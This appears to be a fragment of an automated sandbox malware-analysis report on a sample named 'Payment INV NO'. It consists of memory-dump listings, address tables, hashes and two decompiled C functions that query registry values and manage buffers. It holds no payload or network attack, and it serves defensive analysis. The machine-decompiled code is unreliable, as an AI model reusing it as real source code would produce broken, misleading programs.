                                                          0x017f80df
                                                          0x017f80e1
                                                          0x017f80e3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f80e3
                                                          0x017a3a0b
                                                          0x017a3a15
                                                          0x017a3a19
                                                          0x017a3a28
                                                          0x017a3a2f
                                                          0x017a3a33
                                                          0x017a3a37
                                                          0x017a3a38
                                                          0x017a3a3f
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3a41
                                                          0x00000000
                                                          0x017f80c4
                                                          0x017f80c4
                                                          0x017f80c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f80ce
                                                          0x017a3a85
                                                          0x017a39fa
                                                          0x00000000
                                                          0x017a39fa
                                                          0x017a3a6d
                                                          0x017a3a6d
                                                          0x00000000
                                                          0x017a3a6d
                                                          0x017a39ca
                                                          0x017a39cc
                                                          0x017a39d1
                                                          0x017a39d3
                                                          0x017a39d3
                                                          0x00000000
                                                          0x017a39ca
                                                          0x017f805b
                                                          0x017f8061
                                                          0x00000000
                                                          0x00000000
                                                          0x017f8063
                                                          0x017f8069
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f8069
                                                          0x017f8028
                                                          0x00000000
                                                          0x017f8028
                                                          0x017f7ff7
                                                          0x017f7ffd
                                                          0x00000000
                                                          0x00000000
                                                          0x017f7fff
                                                          0x017f8005
                                                          0x00000000
                                                          0x00000000
                                                          0x017f8007
                                                          0x017f800d
                                                          0x00000000
                                                          0x00000000
                                                          0x017f800f
                                                          0x017f8015
                                                          0x00000000
                                                          0x00000000
                                                          0x017f8017
                                                          0x017f801a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f801a
                                                          0x017a3978
                                                          0x017a3980
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3986
                                                          0x017a3990
                                                          0x017f809a
                                                          0x017f809e
                                                          0x00000000
                                                          0x00000000
                                                          0x017f80af
                                                          0x017f80b4
                                                          0x017f80b6
                                                          0x00000000
                                                          0x00000000
                                                          0x017f80b8
                                                          0x017f80bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3990
                                                          0x017a3a43
                                                          0x017a3a53
                                                          0x017a3a58
                                                          0x017a3a58

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d64853de230da0a34309910e85a38e82e0fd71f37f3ec82a71efaca781f4d05e
                                                          • Instruction ID: 17d003d88a7c77a26411c0a80bd8b03e29b44894534037e3912dacfb06ae7e44
                                                          • Opcode Fuzzy Hash: d64853de230da0a34309910e85a38e82e0fd71f37f3ec82a71efaca781f4d05e
                                                          • Instruction Fuzzy Hash: 1291D031A083568BDB15DF18C4807ABFBE1BF94354F848A6EFA958B391E330C941C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01798239 Relevance: .2, Instructions: 233COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E01798239(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				signed char _v592;
				signed char _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t94;
				char* _t99;
				intOrPtr _t118;
				intOrPtr _t122;
				intOrPtr _t125;
				short _t126;
				signed int* _t137;
				signed char _t138;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t148;
				signed char _t150;
				signed int _t151;
				void* _t152;
				signed int _t154;

				_t149 = __edx;
				_v12 =  *0x188d360 ^ _t154;
				_v564 = _v564 & 0x00000000;
				_t151 = _a4;
				_t137 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t150 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E017A6D30( &_v580, 0x1774648) < 0) {
					L4:
					return E017DB640(_t89, _t137, _v12 ^ _t154, _t149, _t150, _t151);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_push(2);
				_push( &_v580);
				_push( *_t137);
				_t89 = E017D9650();
				if(_t89 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t89 = 0;
					} else {
						_t94 =  *_t151;
						_t151 =  *(_t151 + 4);
						_v588 = _t94;
						_v584 = _t151;
						if(E017A6D30( &_v580, 0x1777730) < 0) {
							goto L4;
						}
						if(E017AAA20( &_v560,  &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t151 + 8;
						}
						_t99 =  &_v560;
						_t143 = 0;
						_v596 = _t99;
						_v600 = 0;
						do {
							_t149 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t99);
							_push(0);
							_push(_t143);
							_push( *_t137);
							_t151 = E017D9820();
							if(_t151 < 0) {
								goto L37;
							}
							_t145 = _v596;
							_v580 =  *((intOrPtr*)(_t145 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t145 + 0xc));
							_v576 = _t145 + 0x10;
							_v636 =  *_t137;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t151 = E017D9600();
							if(_t151 < 0) {
								goto L37;
							}
							_t151 = E017A6D30( &_v580, 0x1782670);
							if(_t151 < 0) {
								L36:
								_push(_v564);
								E017D95D0();
								goto L37;
							}
							_t138 = _v592;
							_t118 = _v568;
							do {
								_push( &_v572);
								_push(_t118);
								_push(_t138);
								_push(2);
								_push( &_v580);
								_push(_v564);
								_t152 = E017D9650();
								if(_t152 == 0x80000005 || _t152 == 0xc0000023) {
									if(_t150 != 0) {
										E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
									}
									_t147 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t122 =  *0x1887b9c; // 0x0
										_t150 = E017B4620(_t147, _t147, _t122 + 0x180000, _v572);
										if(_t150 == 0) {
											goto L25;
										}
										_t118 = _v572;
										_t138 = _t150;
										_v596 = _t150;
										_v568 = _t118;
										goto L27;
									} else {
										_t150 = 0;
										L25:
										_t151 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t118 = _v568;
								}
								L27:
							} while (_t151 == 0x80000005 || _t151 == 0xc0000023);
							_v592 = _t138;
							_t137 = _v608;
							if(_t151 >= 0) {
								_t148 = _v592;
								if( *((intOrPtr*)(_t148 + 4)) != 1) {
									goto L36;
								}
								_t125 =  *((intOrPtr*)(_t148 + 8));
								if(_t125 > 0xfffe) {
									goto L36;
								}
								_t126 = _t125 + 0xfffffffe;
								_v616 = _t126;
								_v614 = _t126;
								_v612 = _t148 + 0xc;
								if(E017A9660( &_v588,  &_v616, 1) == 0) {
									break;
								}
								goto L36;
							}
							_push(_v564);
							E017D95D0();
							_t65 = _t151 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t151 = _t151 &  ~_t65;
							L37:
							_t99 = _v596;
							_t143 = _v600 + 1;
							_v600 = _t143;
						} while (_t151 >= 0);
						if(_t150 != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
						}
						if(_t151 >= 0) {
							_push( *_t137);
							E017D95D0();
							 *_t137 = _v564;
						}
						_t85 = _t151 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t89 =  ~_t85 & _t151;
					}
					goto L4;
				}
				if(_t89 != 0xc0000034) {
					if(_t89 == 0xc0000023) {
						goto L3;
					}
					if(_t89 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

















































                                                          0x01798239
                                                          0x0179824b
                                                          0x0179824e
                                                          0x0179825d
                                                          0x01798260
                                                          0x0179826e
                                                          0x01798275
                                                          0x0179827b
                                                          0x0179827d
                                                          0x01798287
                                                          0x01798294
                                                          0x017982ce
                                                          0x017982de
                                                          0x017982de
                                                          0x0179829c
                                                          0x0179829d
                                                          0x017982a8
                                                          0x017982a9
                                                          0x017982b1
                                                          0x017982b2
                                                          0x017982b4
                                                          0x017982bb
                                                          0x017f2dfa
                                                          0x017982cc
                                                          0x017982cc
                                                          0x017f2e19
                                                          0x017f2e19
                                                          0x017f2e1b
                                                          0x017f2e1e
                                                          0x017f2e30
                                                          0x017f2e3d
                                                          0x00000000
                                                          0x00000000
                                                          0x017f2e5a
                                                          0x017f2e61
                                                          0x017f2e68
                                                          0x017f2e72
                                                          0x017f2e72
                                                          0x017f2e78
                                                          0x017f2e7e
                                                          0x017f2e80
                                                          0x017f2e86
                                                          0x017f2e8c
                                                          0x017f2e8c
                                                          0x017f2e92
                                                          0x017f2e93
                                                          0x017f2e99
                                                          0x017f2e9a
                                                          0x017f2e9c
                                                          0x017f2e9d
                                                          0x017f2ea4
                                                          0x017f2ea8
                                                          0x00000000
                                                          0x00000000
                                                          0x017f2eae
                                                          0x017f2eb8
                                                          0x017f2ec3
                                                          0x017f2eca
                                                          0x017f2ed1
                                                          0x017f2edb
                                                          0x017f2ee3
                                                          0x017f2eef
                                                          0x017f2efb
                                                          0x017f2efc
                                                          0x017f2f08
                                                          0x017f2f12
                                                          0x017f2f13
                                                          0x017f2f22
                                                          0x017f2f26
                                                          0x00000000
                                                          0x00000000
                                                          0x017f2f3d
                                                          0x017f2f41
                                                          0x017f3069
                                                          0x017f3069
                                                          0x017f306f
                                                          0x00000000
                                                          0x017f306f
                                                          0x017f2f47
                                                          0x017f2f4d
                                                          0x017f2f53
                                                          0x017f2f59
                                                          0x017f2f5a
                                                          0x017f2f5b
                                                          0x017f2f5c
                                                          0x017f2f64
                                                          0x017f2f65
                                                          0x017f2f70
                                                          0x017f2f78
                                                          0x017f2f84
                                                          0x017f2f92
                                                          0x017f2f92
                                                          0x017f2f9d
                                                          0x017f2fa2
                                                          0x017f2fed
                                                          0x017f3004
                                                          0x017f3008
                                                          0x00000000
                                                          0x00000000
                                                          0x017f300a
                                                          0x017f3010
                                                          0x017f3012
                                                          0x017f3018
                                                          0x00000000
                                                          0x017f2fa4
                                                          0x017f2fa4
                                                          0x017f2fa6
                                                          0x017f2fa6
                                                          0x00000000
                                                          0x017f2fa6
                                                          0x017f2fab
                                                          0x017f2fab
                                                          0x017f2fab
                                                          0x017f2fab
                                                          0x017f2fb1
                                                          0x017f2fb1
                                                          0x017f2fc1
                                                          0x017f2fc7
                                                          0x017f2fcf
                                                          0x017f3020
                                                          0x017f302a
                                                          0x00000000
                                                          0x00000000
                                                          0x017f302c
                                                          0x017f3034
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3036
                                                          0x017f3039
                                                          0x017f3040
                                                          0x017f304a
                                                          0x017f3067
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3067
                                                          0x017f2fd1
                                                          0x017f2fd7
                                                          0x017f2fdc
                                                          0x017f2fe4
                                                          0x017f2fe6
                                                          0x017f3074
                                                          0x017f307a
                                                          0x017f3080
                                                          0x017f3081
                                                          0x017f3087
                                                          0x017f3091
                                                          0x017f309f
                                                          0x017f309f
                                                          0x017f30a6
                                                          0x017f30a8
                                                          0x017f30aa
                                                          0x017f30b5
                                                          0x017f30b5
                                                          0x017f30b7
                                                          0x017f30bf
                                                          0x017f30c1
                                                          0x017f30c1
                                                          0x00000000
                                                          0x017f2dfa
                                                          0x017982c6
                                                          0x017f2ddd
                                                          0x00000000
                                                          0x00000000
                                                          0x017f2de8
                                                          0x00000000
                                                          0x00000000
                                                          0x017f2dee
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34667f2571eaf666736603fcbae7917575889b79658dd323f7209caf57530c37
                                                          • Instruction ID: e8833c478ef89d34104ba5f5dd521def6c517205c2c558a2682e8d3d96efc1af
                                                          • Opcode Fuzzy Hash: 34667f2571eaf666736603fcbae7917575889b79658dd323f7209caf57530c37
                                                          • Instruction Fuzzy Hash: DAA159719116299BDF31DF68CC88BAAF7B8EF44704F1001EAEA09A7250D7359E84CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179C600 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E0179C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x188d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E017A6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E017DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t14 = _t70 + 0xc; // 0xc
					_t121 = _t14;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1887b9c; // 0x0
					_t74 = E017B4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E017D9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										E017B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E017DF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E017D13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					E017B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E017D9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                          0x0179c608
                                                          0x0179c615
                                                          0x0179c625
                                                          0x0179c62d
                                                          0x0179c635
                                                          0x0179c640
                                                          0x0179c680
                                                          0x0179c687
                                                          0x0179c688
                                                          0x0179c689
                                                          0x0179c694
                                                          0x0179c694
                                                          0x0179c642
                                                          0x0179c64a
                                                          0x0179c697
                                                          0x0179c697
                                                          0x01807a25
                                                          0x01807a2b
                                                          0x01807a2e
                                                          0x01807a30
                                                          0x01807bea
                                                          0x01807bea
                                                          0x00000000
                                                          0x01807bea
                                                          0x01807a36
                                                          0x01807a43
                                                          0x01807a48
                                                          0x01807a4c
                                                          0x01807a4e
                                                          0x00000000
                                                          0x00000000
                                                          0x01807a58
                                                          0x01807a5a
                                                          0x01807a5b
                                                          0x01807a5c
                                                          0x01807a5d
                                                          0x01807a63
                                                          0x01807a64
                                                          0x01807a6a
                                                          0x01807a6c
                                                          0x01807a6e
                                                          0x018079cb
                                                          0x018079cb
                                                          0x018079ce
                                                          0x018079d0
                                                          0x01807a98
                                                          0x01807a9b
                                                          0x01807a9b
                                                          0x01807a9e
                                                          0x01807aa1
                                                          0x01807bbe
                                                          0x01807bbe
                                                          0x01807bc0
                                                          0x01807be0
                                                          0x01807be0
                                                          0x01807a01
                                                          0x01807a01
                                                          0x01807a05
                                                          0x01807a07
                                                          0x01807a15
                                                          0x01807a15
                                                          0x01807a1a
                                                          0x00000000
                                                          0x01807a1a
                                                          0x01807bc2
                                                          0x01807bc6
                                                          0x01807bc9
                                                          0x01807bcd
                                                          0x01807bcf
                                                          0x018079e6
                                                          0x018079e6
                                                          0x018079eb
                                                          0x018079eb
                                                          0x018079ef
                                                          0x018079f1
                                                          0x00000000
                                                          0x00000000
                                                          0x018079f3
                                                          0x018079f5
                                                          0x018079ff
                                                          0x018079ff
                                                          0x00000000
                                                          0x018079ff
                                                          0x018079f7
                                                          0x018079fd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018079fd
                                                          0x01807bd5
                                                          0x01807bd8
                                                          0x00000000
                                                          0x00000000
                                                          0x01807ba9
                                                          0x01807bac
                                                          0x01807bb0
                                                          0x01807bb1
                                                          0x01807bb1
                                                          0x01807bb6
                                                          0x00000000
                                                          0x01807bb6
                                                          0x01807aa7
                                                          0x01807aaa
                                                          0x00000000
                                                          0x00000000
                                                          0x01807ab2
                                                          0x01807ab3
                                                          0x01807ab5
                                                          0x01807aec
                                                          0x01807aef
                                                          0x01807b25
                                                          0x01807b28
                                                          0x01807b62
                                                          0x01807b64
                                                          0x01807b8f
                                                          0x01807b92
                                                          0x01807b96
                                                          0x01807b98
                                                          0x00000000
                                                          0x00000000
                                                          0x01807b9e
                                                          0x01807b9f
                                                          0x01807ba3
                                                          0x00000000
                                                          0x01807ba3
                                                          0x01807b66
                                                          0x01807b68
                                                          0x01807ae2
                                                          0x01807ae2
                                                          0x00000000
                                                          0x01807ae2
                                                          0x01807b6e
                                                          0x01807b72
                                                          0x01807b75
                                                          0x01807b81
                                                          0x01807b85
                                                          0x01807b87
                                                          0x00000000
                                                          0x00000000
                                                          0x01807b31
                                                          0x01807b34
                                                          0x01807b3c
                                                          0x01807b45
                                                          0x01807b46
                                                          0x01807b4f
                                                          0x01807b51
                                                          0x01807b57
                                                          0x01807b59
                                                          0x01807b59
                                                          0x00000000
                                                          0x01807b59
                                                          0x01807b77
                                                          0x00000000
                                                          0x01807b77
                                                          0x01807b2a
                                                          0x00000000
                                                          0x01807b2a
                                                          0x01807af1
                                                          0x01807af3
                                                          0x00000000
                                                          0x00000000
                                                          0x01807afb
